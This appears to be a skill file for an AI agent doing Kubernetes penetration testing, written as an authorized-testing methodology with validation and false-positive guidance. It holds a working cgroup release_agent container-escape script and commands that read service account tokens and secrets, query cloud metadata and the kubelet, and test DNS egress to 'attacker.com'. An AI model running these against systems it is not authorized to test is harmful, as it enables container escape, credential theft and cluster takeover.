11 KiB
name, description
| name | description |
|---|---|
| kubernetes | Kubernetes cluster security testing - RBAC, API exposure, container escapes, network policies, secrets, and supply chain |
Kubernetes Security Testing
Kubernetes clusters expose a large attack surface through their API server, kubelet, etcd, and workload configurations. Misconfigurations in RBAC, network policies, and container security contexts are common and frequently lead to privilege escalation, lateral movement, and cluster takeover. This skill covers direct cluster access scenarios. For SSRF-mediated Kubernetes access, see the ssrf skill.
Attack Surface
Scope
- Kubernetes API server (typically port 6443 or 443)
- Kubelet API (port 10250 authenticated, port 10255 deprecated read-only)
- etcd (port 2379/2380, stores all cluster state including secrets)
- Cloud provider metadata endpoints reachable from pods
- Container runtimes (containerd, CRI-O) via socket access
- Service mesh sidecars and ingress controllers
Entry Points
- Exposed API server with weak or anonymous authentication
- Compromised pod with mounted service account token
- CI/CD runner with cluster credentials (kubeconfig files, IRSA tokens)
- Exposed management UIs (Kubernetes Dashboard, Rancher, ArgoCD)
- Node-level access via SSH, cloud instance metadata, or container escape
Authentication Methods
- Service account tokens (mounted at
/var/run/secrets/kubernetes.io/serviceaccount/token) - Client certificates (kubeconfig files, often found in CI/CD configs, home dirs, cloud storage)
- OIDC tokens, webhook tokens, cloud provider IAM-to-K8s mappings (EKS IRSA, GKE Workload Identity)
- Anonymous access (enabled by default; unauthenticated requests become
system:anonymous/system:unauthenticated, with only explicitly bound RBAC permissions such as public discovery/info roles)
Key Vulnerabilities
RBAC Misconfigurations
- Wildcard verbs or resources in ClusterRole/Role bindings:
verbs: ["*"],resources: ["*"] cluster-adminbound to service accounts that don't need it- Pods running with
automountServiceAccountToken: true(the default) when no API access is needed system:anonymousorsystem:unauthenticatedgroup bound to permissive roles- Roles that grant
escalate,bind, orimpersonateverbs
Test:
kubectl auth can-i --list
kubectl auth can-i create pods --as=system:serviceaccount:default:default
kubectl get clusterrolebindings -o json | jq '.items[] | select(.subjects[]?.name == "system:anonymous")'
Exposed APIs
- API server with
--anonymous-auth=trueand permissive RBAC for anonymous users - Kubelet read-only port 10255 serving
/pods,/spec,/stats - etcd without client certificate authentication:
etcdctl get / --prefix --keys-only - Kubernetes Dashboard with skip-login or default token
- Metrics endpoints (
/metrics,/debug/pprof) leaking internal state
Test:
curl -sk https://<api-server>:6443/api/v1/namespaces
curl -s http://<node-ip>:10255/pods
curl -s http://<node-ip>:10255/metrics
Container Escapes
privileged: truein securityContext grants all Linux capabilities and device accesshostPID: trueenables/procaccess to host processes,nsenterto host namespacehostNetwork: trueplaces the pod on the host network stack- Mounted Docker/containerd socket (
/var/run/docker.sock,/run/containerd/containerd.sock) CAP_SYS_ADMIN+ unconfined AppArmor enables mount namespace escapes via cgroup release_agent- Writable
hostPathmounts to/,/etc, or/var/run
Test:
# Check if running privileged
cat /proc/1/status | grep -i cap
# List host processes via hostPID
ls /proc/*/cmdline 2>/dev/null | head -20
# Check for mounted sockets
ls -la /var/run/docker.sock /run/containerd/containerd.sock 2>/dev/null
# cgroup v1 release_agent escape (privileged + CAP_SYS_ADMIN)
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/exploit.sh" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit.sh && echo "ps aux > $host_path/out" >> /exploit.sh && chmod +x /exploit.sh
sh -c 'echo $$ > /tmp/cgrp/x/cgroup.procs'
Network Policy Gaps
- No NetworkPolicy objects means all pod-to-pod traffic is allowed by default
- Egress policies missing, allowing pods to reach cloud metadata, external C2, or internal services
- Policies that select by namespace label but don't account for label-squatting
- DNS (port 53 UDP/TCP) often exempted from egress rules, enabling DNS tunneling
Test:
kubectl get networkpolicies --all-namespaces
# From inside a pod, test lateral reach
curl -s http://<other-pod-ip>:<port>/
curl -s http://169.254.169.254/latest/meta-data/
nslookup attacker.com
Secret Management Issues
- Secrets stored as base64 in etcd (not encrypted at rest by default)
- Secrets injected via environment variables (visible in
/proc/*/environ,docker inspect, crash dumps) - ConfigMaps containing credentials, API keys, connection strings
- Service account tokens auto-mounted into pods that never call the API
- Helm release secrets containing full chart values with credentials
Test:
kubectl get secrets --all-namespaces -o json | jq '.items[].metadata.name'
kubectl get secret <name> -o json | jq '.data | map_values(@base64d)'
env | grep -iE 'password|key|token|secret|credential'
cat /var/run/secrets/kubernetes.io/serviceaccount/token
Workload Misconfigurations
- Containers running as root (
runAsUser: 0or no securityContext set) - Missing
readOnlyRootFilesystem: true - No resource limits (enables resource exhaustion attacks, noisy neighbor DoS)
allowPrivilegeEscalation: true(the default)- Missing
seccompProfileor AppArmor annotations
Test:
kubectl get pods -o json | jq '.items[].spec.containers[].securityContext'
kubectl get pods -o json | jq '.items[] | select(.spec.containers[].securityContext.privileged == true) | .metadata.name'
Supply Chain Risks
- Images pulled from public registries without digest pinning (
:latesttag is mutable) - No image signing or admission policy (Kyverno, OPA Gatekeeper, Sigstore)
- Init containers or sidecar injectors pulling untrusted images
- Helm charts from unverified repos with post-install hooks
- CI/CD pipelines with broad cluster access and no image scanning
Test:
kubectl get pods -o json | jq '.items[].spec.containers[].image' | grep -v '@sha256'
kubectl get pods -o json | jq '.items[].spec.containers[].image' | grep ':latest'
Bypass Techniques
Token Reuse
- Service account tokens from one pod can access any API object the SA has permissions for
- Tokens from CI/CD systems often have broad access (deploy, create, delete)
- Expired tokens may still work if token verification is misconfigured
Label Manipulation
- If RBAC or NetworkPolicy selects by label, and attacker can set labels on their pod, they can bypass restrictions
- Namespace labels used for admission control can be manipulated if attacker has
updateon namespaces
Admission Webhook Bypass
- Dry-run requests bypass mutating webhooks
- Some webhooks only check specific API groups, leaving others unprotected
- Webhook failures configured as
failurePolicy: Ignoresilently bypass validation
Kubelet Direct Access
- The kubelet API on port 10250 accepts commands independently from the API server
- If you can reach a node's kubelet, you can exec into any pod on that node
- Anonymous kubelet access:
curl -sk https://<node>:10250/runningpods/
Testing Methodology
- Enumerate access - Determine current auth context:
kubectl auth whoami,kubectl auth can-i --list - Map the cluster - List namespaces, pods, services, nodes, and their labels:
kubectl get all -A - Check RBAC - Review ClusterRoleBindings and RoleBindings for overly permissive grants
- Probe APIs - Test API server, kubelet, etcd, and dashboard reachability from your context
- Inspect workloads - Check securityContext, hostPID/hostNetwork, volume mounts, and image tags
- Test network reach - From compromised pod, probe other pods, services, metadata endpoints, and external hosts
- Extract secrets - Enumerate secrets, env vars, mounted tokens, and Helm release values
- Escalate - Chain findings: SA token + permissive RBAC -> create privileged pod -> node access -> cluster-admin
- Benchmark - Run
kube-benchfor CIS compliance,kubesecfor workload hardening scores,trivyfor image CVEs
Validation
- Prove access to resources beyond intended scope (cross-namespace secret read, exec into another team's pod)
- Demonstrate privilege escalation path from initial access to elevated permissions (SA token -> cluster-admin)
- Show actual credential extraction (token, kubeconfig) and verify it grants claimed access level
- For container escapes, demonstrate host filesystem read or host process visibility without destructive actions
- Confirm NetworkPolicy gaps by showing successful cross-namespace or metadata endpoint connections
False Positives
kubectl auth can-ireturningyesfor service accounts that are restricted by admission controllers or OPA policies- Kubelet port 10250 reachable but returning 401/403 (authentication is working correctly)
- NetworkPolicy absent in a namespace that uses a CNI with default-deny (Calico GlobalNetworkPolicy)
- Service account tokens mounted but unused, with admission controllers preventing their abuse
- Images using
:latesttag but pulled from a private registry with immutable tags enabled
Impact
- Full cluster compromise from a single misconfigured RBAC binding or service account
- Lateral movement across namespaces and workloads via pod-to-pod communication
- Cloud account compromise via metadata endpoint access from pods (AWS keys, GCP tokens, Azure MSI)
- Supply chain attacks via compromised base images or Helm chart hooks
- Data exfiltration from secrets, ConfigMaps, and persistent volumes
- Denial of service through resource exhaustion in clusters without resource quotas
Pro Tips
- Start with
kubectl auth can-i --listto understand your blast radius before probing anything - Service account tokens in
/var/run/secrets/are your first pivot point from any compromised pod - Test metadata endpoint access early - cloud credentials from pods are the fastest path to cluster-admin
- Check for
kube-systemnamespace access - controllers there often have cluster-admin equivalent permissions kube-benchoutput is noisy but highlights the CIS benchmark failures that matter most- Container escapes via cgroup release_agent require
CAP_SYS_ADMIN(viaprivileged: trueor an explicit capability grant) plus permissive AppArmor/seccomp confinement - Helm release secrets (
sh.helm.release.v1.*) inkube-systemoften contain credentials from chart values - DNS from inside a pod reveals service names:
dig +short SRV *.*.svc.cluster.local - When testing RBAC, try
--as=impersonation to check what other service accounts can do
Summary
Kubernetes security failures typically chain: a single misconfigured role binding or missing network policy enables lateral movement, which leads to secret extraction, which leads to cloud credential access. Test the chain, not just individual findings. Start from the auth context you have, enumerate what it can reach, and escalate methodically.